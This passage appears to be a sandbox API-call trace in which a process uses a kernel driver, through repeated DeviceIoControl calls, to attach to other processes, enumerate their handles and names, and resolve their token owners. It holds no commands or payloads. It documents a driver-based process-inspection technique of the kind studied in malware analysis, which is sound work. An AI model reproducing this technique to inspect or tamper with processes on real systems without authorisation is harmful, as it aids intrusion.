[0156.131] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.131] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.131] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.131] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0156.131] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.131] PsAcquireProcessExitSynchronization () returned 0x0 [0156.131] KeStackAttachProcess (in: PROCESS=0xfffffa8002095470, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002095470, ApcState=0xfffff880051635d0) [0156.131] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002091d30, HandleInformation=0x0) returned 0x0 [0156.131] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.131] PsReleaseProcessExitSynchronization () returned 0x2 [0156.132] ObfDereferenceObject (Object=0xfffffa8002095470) returned 0x12 [0156.132] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d6044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.132] ObfDereferenceObject (Object=0xfffffa8002091d30) returned 0x1 [0156.132] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.132] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.132] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.132] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.132] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.132] PsAcquireProcessExitSynchronization () returned 0x0 [0156.132] KeStackAttachProcess (in: PROCESS=0xfffffa8002095470, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002095470, ApcState=0xfffff880051635d0) [0156.132] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.132] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.132] PsReleaseProcessExitSynchronization () returned 0x2 [0156.132] ObfDereferenceObject (Object=0xfffffa8002095470) returned 0x12 [0156.132] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030d7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030d7044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.133] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.133] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.133] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.133] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x844) returned 0xc8 [0156.133] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.133] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020acb30, HandleInformation=0x0) returned 0x0 [0156.133] ObOpenObjectByPointer (in: Object=0xfffffa80020acb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0156.133] ObfDereferenceObject (Object=0xfffffa80020acb30) returned 0x14 [0156.133] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa800300e100 | out: TokenHandle=0xfffffa800300e100*=0xc4) returned 0x0 [0156.133] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0156.133] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.133] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.134] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.136] CloseHandle (hObject=0xc4) returned 1 [0156.136] CloseHandle (hObject=0xc8) returned 1 [0156.136] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.136] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.136] PsLookupProcessByProcessId (in: ProcessId=0x844, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.136] PsAcquireProcessExitSynchronization () returned 0x0 [0156.136] KeStackAttachProcess (in: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880051635d0) [0156.136] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800205a390, HandleInformation=0x0) returned 0x0 [0156.136] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.136] PsReleaseProcessExitSynchronization () returned 0x2 [0156.136] ObfDereferenceObject (Object=0xfffffa80020acb30) returned 0x12 [0156.136] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d8044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.136] ObfDereferenceObject (Object=0xfffffa800205a390) returned 0x1 [0156.136] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.137] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.137] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.137] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x98, lpOverlapped=0x0) returned 1 [0156.137] PsLookupProcessByProcessId (in: ProcessId=0x844, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.137] PsAcquireProcessExitSynchronization () returned 0x0 [0156.137] KeStackAttachProcess (in: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880051635d0) [0156.137] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020aeb00, HandleInformation=0x0) returned 0x0 [0156.137] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.137] PsReleaseProcessExitSynchronization () returned 0x2 [0156.137] ObfDereferenceObject (Object=0xfffffa80020acb30) returned 0x12 [0156.137] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d9044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.137] ObfDereferenceObject (Object=0xfffffa80020aeb00) returned 0x1 [0156.137] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.137] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.138] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.138] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.138] PsLookupProcessByProcessId (in: ProcessId=0x844, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.138] PsAcquireProcessExitSynchronization () returned 0x0 [0156.138] KeStackAttachProcess (in: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880051635d0) [0156.138] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.138] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.760] PsReleaseProcessExitSynchronization () returned 0x2 [0156.760] ObfDereferenceObject (Object=0xfffffa80020acb30) returned 0x12 [0156.760] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030da044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030da044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.760] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.760] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.763] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x854) returned 0xc8 [0156.763] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.764] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020b8b30, HandleInformation=0x0) returned 0x0 [0156.764] ObOpenObjectByPointer (in: Object=0xfffffa80020b8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0156.764] ObfDereferenceObject (Object=0xfffffa80020b8b30) returned 0x14 [0156.764] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002950100 | out: TokenHandle=0xfffffa8002950100*=0xc4) returned 0x0 [0156.764] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0156.764] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.764] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.764] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.767] CloseHandle (hObject=0xc4) returned 1 [0156.767] CloseHandle (hObject=0xc8) returned 1 [0156.767] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.767] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.767] PsLookupProcessByProcessId (in: ProcessId=0x854, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.768] PsAcquireProcessExitSynchronization () returned 0x0 [0156.768] KeStackAttachProcess (in: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880051635d0) [0156.768] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f4cb00, HandleInformation=0x0) returned 0x0 [0156.768] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.768] PsReleaseProcessExitSynchronization () returned 0x2 [0156.768] ObfDereferenceObject (Object=0xfffffa80020b8b30) returned 0x12 [0156.768] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030ab044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030ab044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.768] ObfDereferenceObject (Object=0xfffffa8001f4cb00) returned 0x1 [0156.768] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.769] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.769] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.769] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0156.769] PsLookupProcessByProcessId (in: ProcessId=0x854, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.769] PsAcquireProcessExitSynchronization () returned 0x0 [0156.769] KeStackAttachProcess (in: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880051635d0) [0156.769] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020b8400, HandleInformation=0x0) returned 0x0 [0156.769] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.769] PsReleaseProcessExitSynchronization () returned 0x2 [0156.769] ObfDereferenceObject (Object=0xfffffa80020b8b30) returned 0x12 [0156.769] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003003044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003003044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.770] ObfDereferenceObject (Object=0xfffffa80020b8400) returned 0x1 [0156.770] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.770] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.770] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.770] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.770] PsLookupProcessByProcessId (in: ProcessId=0x854, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.770] PsAcquireProcessExitSynchronization () returned 0x0 [0156.770] KeStackAttachProcess (in: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880051635d0) [0156.770] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.770] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.770] PsReleaseProcessExitSynchronization () returned 0x2 [0156.771] ObfDereferenceObject (Object=0xfffffa80020b8b30) returned 0x12 [0156.771] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030c1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c1044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.771] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.771] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.771] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x864) returned 0xc8 [0156.771] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.771] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020c1760, HandleInformation=0x0) returned 0x0 [0156.771] ObOpenObjectByPointer (in: Object=0xfffffa80020c1760, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0156.771] ObfDereferenceObject (Object=0xfffffa80020c1760) returned 0x14 [0156.772] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8002950100 | out: TokenHandle=0xfffffa8002950100*=0xc4) returned 0x0 [0156.772] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0156.772] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.772] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0156.772] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0156.774] CloseHandle (hObject=0xc4) returned 1 [0156.774] CloseHandle (hObject=0xc8) returned 1 [0156.775] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.775] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0156.775] PsLookupProcessByProcessId (in: ProcessId=0x864, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.775] PsAcquireProcessExitSynchronization () returned 0x0 [0156.775] KeStackAttachProcess (in: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880051635d0) [0156.775] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020c6d20, HandleInformation=0x0) returned 0x0 [0156.775] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.775] PsReleaseProcessExitSynchronization () returned 0x2 [0156.775] ObfDereferenceObject (Object=0xfffffa80020c1760) returned 0x12 [0156.775] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030b4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030b4044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.775] ObfDereferenceObject (Object=0xfffffa80020c6d20) returned 0x1 [0156.775] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.775] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.776] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.776] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0156.776] PsLookupProcessByProcessId (in: ProcessId=0x864, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.776] PsAcquireProcessExitSynchronization () returned 0x0 [0156.776] KeStackAttachProcess (in: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880051635d0) [0156.776] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020c14e0, HandleInformation=0x0) returned 0x0 [0156.776] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.776] PsReleaseProcessExitSynchronization () returned 0x2 [0156.776] ObfDereferenceObject (Object=0xfffffa80020c1760) returned 0x12 [0156.776] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003004044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003004044, ReturnLength=0xfffff88005163508) returned 0x0 [0156.776] ObfDereferenceObject (Object=0xfffffa80020c14e0) returned 0x1 [0156.776] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.776] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.776] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0156.777] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0156.777] PsLookupProcessByProcessId (in: ProcessId=0x864, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0156.777] PsAcquireProcessExitSynchronization () returned 0x0 [0156.777] KeStackAttachProcess (in: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020c1760, ApcState=0xfffff880051635d0) [0156.777] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0156.777] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0156.777] PsReleaseProcessExitSynchronization () returned 0x2 [0156.777] ObfDereferenceObject (Object=0xfffffa80020c1760) returned 0x12 [0156.777] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002ff8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ff8044, ReturnLength=0xfffff88005163550) returned 0x0 [0156.777] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0156.777] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0156.777] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0156.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x874) returned 0xc8 [0156.778] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0156.778] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020cf7c0, HandleInformation=0x0) returned 0x0 [0156.778] ObOpenObjectByPointer (in: Object=0xfffffa80020cf7c0, HandleAttributes=0x200, PassedAccessState=0x0, 